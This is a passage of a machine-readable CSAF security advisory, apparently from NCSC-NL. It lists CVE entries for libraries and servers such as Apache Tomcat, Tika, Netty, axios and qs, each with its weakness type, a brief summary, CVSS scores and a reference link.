          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:H",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2024-38286 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-38286.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2024-38286"
    },
    {
      "cve": "CVE-2024-45296",
      "cwe": {
        "id": "CWE-1333",
        "name": "Inefficient Regular Expression Complexity"
      },
      "notes": [
        {
          "category": "other",
          "text": "Inefficient Regular Expression Complexity",
          "title": "CWE-1333"
        },
        {
          "category": "description",
          "text": "Multiple vulnerabilities in the path-to-regexp library and related components can lead to Denial of Service (DoS) attacks, particularly affecting Node.js applications and IBM App Connect Enterprise due to backtracking regex issues.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2024-45296 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-45296.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2024-45296"
    },
    {
      "cve": "CVE-2024-45801",
      "cwe": {
        "id": "CWE-1333",
        "name": "Inefficient Regular Expression Complexity"
      },
      "notes": [
        {
          "category": "other",
          "text": "Inefficient Regular Expression Complexity",
          "title": "CWE-1333"
        },
        {
          "category": "other",
          "text": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
          "title": "CWE-1321"
        },
        {
          "category": "description",
          "text": "Multiple vulnerabilities across Oracle products and DOMPurify allow for data compromise, denial of service, and XSS attacks, with CVSS scores ranging from 6.3 to 7.3.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2024-45801 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-45801.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2024-45801"
    },
    {
      "cve": "CVE-2025-12383",
      "cwe": {
        "id": "CWE-362",
        "name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
      },
      "notes": [
        {
          "category": "other",
          "text": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
          "title": "CWE-362"
        },
        {
          "category": "other",
          "text": "CWE-1035",
          "title": "CWE-1035"
        },
        {
          "category": "other",
          "text": "CWE-937",
          "title": "CWE-937"
        },
        {
          "category": "description",
          "text": "Oracle Database Server versions 23.4.0-23.26.0 have a vulnerability in the Fleet Patching and Provisioning component, while Eclipse Jersey versions 2.45, 3.0.16, and 3.1.9 may ignore critical SSL configurations due to a race condition.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-12383 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-12383.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-12383"
    },
    {
      "cve": "CVE-2025-15284",
      "cwe": {
        "id": "CWE-20",
        "name": "Improper Input Validation"
      },
      "notes": [
        {
          "category": "other",
          "text": "Improper Input Validation",
          "title": "CWE-20"
        },
        {
          "category": "other",
          "text": "Allocation of Resources Without Limits or Throttling",
          "title": "CWE-770"
        },
        {
          "category": "description",
          "text": "The `qs` module\u0027s `arrayLimit` option is vulnerable to denial-of-service attacks due to its failure to enforce limits for bracket notation, allowing attackers to exploit memory exhaustion.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-15284 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-15284.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-15284"
    },
    {
      "cve": "CVE-2025-27152",
      "cwe": {
        "id": "CWE-918",
        "name": "Server-Side Request Forgery (SSRF)"
      },
      "notes": [
        {
          "category": "other",
          "text": "Server-Side Request Forgery (SSRF)",
          "title": "CWE-918"
        },
        {
          "category": "description",
          "text": "Recent vulnerabilities in axios, pgadmin4, and HPE software expose systems to SSRF and credential leakage, particularly through the use of absolute URLs, necessitating updates to mitigate these risks.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-27152 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-27152.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-27152"
    },
    {
      "cve": "CVE-2025-41249",
      "cwe": {
        "id": "CWE-285",
        "name": "Improper Authorization"
      },
      "notes": [
        {
          "category": "other",
          "text": "Improper Authorization",
          "title": "CWE-285"
        },
        {
          "category": "other",
          "text": "Incorrect Authorization",
          "title": "CWE-863"
        },
        {
          "category": "other",
          "text": "CWE-1035",
          "title": "CWE-1035"
        },
        {
          "category": "other",
          "text": "CWE-937",
          "title": "CWE-937"
        },
        {
          "category": "description",
          "text": "Multiple vulnerabilities have been identified in Oracle Financial Services and Retail products, as well as the Spring Framework, allowing unauthorized access to sensitive data and potentially leading to information disclosure.",
          "title": "Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-41249 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-41249.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-41249"
    },
    {
      "cve": "CVE-2025-48976",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "notes": [
        {
          "category": "other",
          "text": "Allocation of Resources Without Limits or Throttling",
          "title": "CWE-770"
        },
        {
          "category": "description",
          "text": "Multiple denial-of-service vulnerabilities have been identified in Oracle Application Testing Suite, Oracle Agile PLM, Apache Commons FileUpload, and HPE IceWall Identity Manager, with CVSS scores of 7.5 for some products.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-48976 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-48976.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-48976"
    },
    {
      "cve": "CVE-2025-48989",
      "cwe": {
        "id": "CWE-404",
        "name": "Improper Resource Shutdown or Release"
      },
      "notes": [
        {
          "category": "other",
          "text": "Improper Resource Shutdown or Release",
          "title": "CWE-404"
        },
        {
          "category": "other",
          "text": "Uncontrolled Resource Consumption",
          "title": "CWE-400"
        },
        {
          "category": "description",
          "text": "Recent updates for Apache Tomcat versions 9, 10, and 11 address the \u0027MadeYouReset\u0027 DoS vulnerability and other issues, with specific versions being susceptible to Denial of Service attacks from malformed client requests.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-48989 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-48989.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-48989"
    },
    {
      "cve": "CVE-2025-49146",
      "cwe": {
        "id": "CWE-287",
        "name": "Improper Authentication"
      },
      "notes": [
        {
          "category": "other",
          "text": "Improper Authentication",
          "title": "CWE-287"
        },
        {
          "category": "description",
          "text": "Multiple vulnerabilities in the Oracle Enterprise Data Quality product and PostgreSQL JDBC Driver allow unauthorized access and insecure authentication, with CVSS scores indicating significant risk.",
          "title": "Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-49146 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-49146.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-49146"
    },
    {
      "cve": "CVE-2025-52434",
      "cwe": {
        "id": "CWE-362",
        "name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
      },
      "notes": [
        {
          "category": "other",
          "text": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
          "title": "CWE-362"
        },
        {
          "category": "description",
          "text": "Apache Tomcat versions 9.0.0.M1 to 9.0.106 have multiple vulnerabilities, including a race condition affecting HTTP/2 connections and denial of service flaws, alongside issues in Oracle Graph Server and HPE Unified OSS Console.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:U",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-52434 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-52434.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-52434"
    },
    {
      "cve": "CVE-2025-52999",
      "cwe": {
        "id": "CWE-121",
        "name": "Stack-based Buffer Overflow"
      },
      "notes": [
        {
          "category": "other",
          "text": "Stack-based Buffer Overflow",
          "title": "CWE-121"
        },
        {
          "category": "description",
          "text": "Multiple vulnerabilities affect Oracle Communications Unified Assurance and Oracle Business Intelligence Enterprise Edition, allowing denial of service attacks, while older jackson-core versions are prone to StackoverflowErrors when parsing nested data.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-52999 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-52999.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-52999"
    },
    {
      "cve": "CVE-2025-53689",
      "cwe": {
        "id": "CWE-611",
        "name": "Improper Restriction of XML External Entity Reference"
      },
      "notes": [
        {
          "category": "other",
          "text": "Improper Restriction of XML External Entity Reference",
          "title": "CWE-611"
        },
        {
          "category": "description",
          "text": "Apache Jackrabbit versions prior to 2.23.2 are vulnerable to blind XXE attacks due to an unsecured document build for loading privileges.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:A/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-53689 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-53689.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-53689"
    },
    {
      "cve": "CVE-2025-54988",
      "cwe": {
        "id": "CWE-611",
        "name": "Improper Restriction of XML External Entity Reference"
      },
      "notes": [
        {
          "category": "other",
          "text": "Improper Restriction of XML External Entity Reference",
          "title": "CWE-611"
        },
        {
          "category": "other",
          "text": "CWE-1035",
          "title": "CWE-1035"
        },
        {
          "category": "other",
          "text": "CWE-937",
          "title": "CWE-937"
        },
        {
          "category": "description",
          "text": "Apache Tika versions 1.13 to 3.2.1 have a critical XXE vulnerability, while Oracle PeopleSoft\u0027s OpenSearch component in versions 8.60 to 8.62 is also affected by an easily exploitable vulnerability.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-54988 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-54988.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-54988"
    },
    {
      "cve": "CVE-2025-55163",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "notes": [
        {
          "category": "other",
          "text": "Allocation of Resources Without Limits or Throttling",
          "title": "CWE-770"
        },
        {
          "category": "other",
          "text": "CWE-1035",
          "title": "CWE-1035"
        },
        {
          "category": "other",
          "text": "CWE-937",
          "title": "CWE-937"
        },
        {
          "category": "description",
          "text": "Recent updates to Netty and Oracle Communications products address critical vulnerabilities, including the \u0027MadeYouReset\u0027 attack in HTTP/2, which can lead to denial of service and resource exhaustion.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-55163 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-55163.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-55163"
    },
    {
      "cve": "CVE-2025-55752",
      "cwe": {
        "id": "CWE-23",
        "name": "Relative Path Traversal"
      },
      "notes": [
        {
          "category": "other",
          "text": "Relative Path Traversal",
          "title": "CWE-23"
        },
        {
          "category": "other",
          "text": "CWE-1035",
          "title": "CWE-1035"
        },
        {
          "category": "other",
          "text": "CWE-937",
          "title": "CWE-937"
        },
        {
          "category": "description",
          "text": "Apache Tomcat versions 1.0.0-M1 to 11.0.10 are vulnerable to a directory traversal issue that may allow remote code execution if HTTP PUT requests are enabled, alongside other security vulnerabilities in HPE UOCAM.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-55752 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-55752.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-55752"
    },
    {
      "cve": "CVE-2025-64775",
      "cwe": {
        "id": "CWE-459",
        "name": "Incomplete Cleanup"
      },
      "notes": [
        {
          "category": "other",
          "text": "Incomplete Cleanup",
          "title": "CWE-459"
        },
        {
          "category": "other",
          "text": "CWE-1035",
          "title": "CWE-1035"
        },
        {
          "category": "other",
          "text": "CWE-937",
          "title": "CWE-937"
        },
        {
          "category": "description",
          "text": "Apache Struts versions 2.0.0 to 6.7.0 and 7.0.0 to 7.0.3 have a Denial of Service vulnerability due to file leak in multipart request processing, affecting NetApp products.",
          "title": "Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-64775 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-64775.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-64775"
    },
    {
      "cve": "CVE-2025-66516",
      "cwe": {
        "id": "CWE-611",
        "name": "Improper Restriction of XML External Entity Reference"
      },
      "notes": [
        {
          "category": "other",
          "text": "Improper Restriction of XML External Entity Reference",
          "title": "CWE-611"
        },
        {
          "category": "other",
          "text": "CWE-1035",
          "title": "CWE-1035"
        },
        {
          "category": "other",
          "text": "CWE-937",
          "title": "CWE-937"
        },
        {
          "category": "description",
          "text": "Apache Tika has multiple critical XML External Entity (XXE) injection vulnerabilities, particularly affecting PDF parsing, allowing remote attackers to exploit crafted documents for sensitive data disclosure and remote code execution.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-66516 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-66516.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 10.0,
            "baseSeverity": "CRITICAL",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-66516"
    },
    {
      "cve": "CVE-2025-9287",
      "cwe": {
        "id": "CWE-20",
        "name": "Improper Input Validation"
      },
      "notes": [
        {
          "category": "other",
          "text": "Improper Input Validation",
          "title": "CWE-20"
        },
        {
          "category": "description",
          "text": "The document outlines a vulnerability in the `create-hash` package due to inadequate input type checks, leading to potential hash state manipulation and security risks, particularly in the `cipher-base` npm package versions up to 1.0.4.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-9287 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-9287.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
